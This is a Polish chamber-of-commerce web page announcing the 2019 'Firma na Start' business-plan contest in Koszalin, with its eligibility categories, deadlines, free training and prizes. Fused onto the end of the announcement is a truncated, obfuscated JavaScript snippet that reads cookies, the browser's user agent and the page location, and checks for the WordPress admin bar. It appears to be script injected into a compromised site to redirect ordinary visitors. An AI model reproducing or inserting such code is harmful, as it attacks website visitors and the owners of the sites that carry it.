V. Edycja Konkursu „Firma na Start” | Północna Izba Gospodarcza w Koszalinie

Rusza piąta edycja konkursu „Firma na Start”. Podobnie jak w poprzednich latach  Miasto Koszalin wraz z Partnerami zaprasza do udziału uczestników w dwóch kategoriach. Na zwycięzcę czeka 20 tysięcy złotych i inne cenne nagrody.

Konkurs „Firma na Start” to inicjatywa prezydenta Piotra Jedlińskiego promująca aktywne postawy i rozwój przedsiębiorczości w Koszalinie. Ideą tego przedsięwzięcia jest przede wszystkim zaszczepienie w młodych ludziach myślenia biznesowego oraz udzielenie wsparcia osobom, które już posiadają konkretny pomysł na rozpoczęcie dzielności  lecz brakuje im odpowiedniego zaplecza w postaci środków, lokalu, know-how lub być może pewności siebie. Konkurs ma wspierać indywidualną przedsiębiorczość i pomagać jego uczestnikom w samorealizacji na rynku pracy.

Zapraszamy do udziału w piątej edycji Konkursu „Firma na Start”

Zadaniem uczestnika Konkursu jest napisanie biznesplanu dotyczącego własnego pomysłu na działalność gospodarczą w Koszalinie. Zwycięzcami Konkursu zostają uczestnicy, którzy przedstawią najciekawszy, możliwy do realizacji biznesplan konkretnego przedsięwzięcia. W trakcie Konkursu prowadzane są bezpłatne szkolenia dla wszystkich uczestników w zakresie prawidłowej konstrukcji biznesplanów oraz zakładania działalności gospodarczej a także  spotkania z ekspertami.

 Termin zgłaszania udziału w Konkursie od 4 września do 4 października 2019 r.

 Kto może wziąć udział w Konkursie?

Konkurs organizowany jest w dwóch odrębnych kategoriach:

Kategoria I: osoby  fizyczne w wieku od 18 do 35 lat,

Kategoria II: uczniowie koszalińskich szkół ponadpodstawowych.

Krok po kroku!

Wypełnij i prześlij  Formularz Zgłoszeniowy w terminie do 4 października br. na adres Urząd Miejski w Koszalinie, ul . Rynek Staromiejski 6-7, 75-007 Koszalin z dopiskiem „Firma na Start 2019” oraz elektronicznie na adres e-mail biznesplan@um.koszalin.pl;

Weź udział w obowiązkowych –  bezpłatnych szkoleniach organizowanych w ramach Konkursu;

Opracuj  biznesplan do zgłoszonego pomysłu  i dostarcz go do Organizatora w terminie do 14 listopada 2019 r.  (w formie pisemnej i elektronicznej);

Zaprezentuj swój pomysł Kapitule Konkursowej;

Przyjdź na Galę Finałową, podczas której zaprezentowane zostaną oficjalne wyniki Konkursu!

Co zyskujesz!

profesjonalne szkolenia i spotkania z ekspertami,

– usługi ułatwiające rozpoczęcie własnego biznesu,

dla zwycięzców atrakcyjne nagrody rzeczowe i finansowe (sprzęt komputerowy, studia podyplomowe, usługi księgowe i wiele innych).

Główna nagroda dla Zwycięzcy Kategorii I. 20.000 PLN brutto ufundowana przez Prezydenta Miasta Koszalina.

Nagrody rzeczowe m.in. tablet Microsoft Surface Go z klawiaturą, drukarka, cyfrowy aparat fotograficzny, smartfon, aparat fotograficzny z natychmiastowym wydrukiem oraz robot modułowy Krypton !!!

Więcej informacji: https://www.koszalin.pl/firma 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m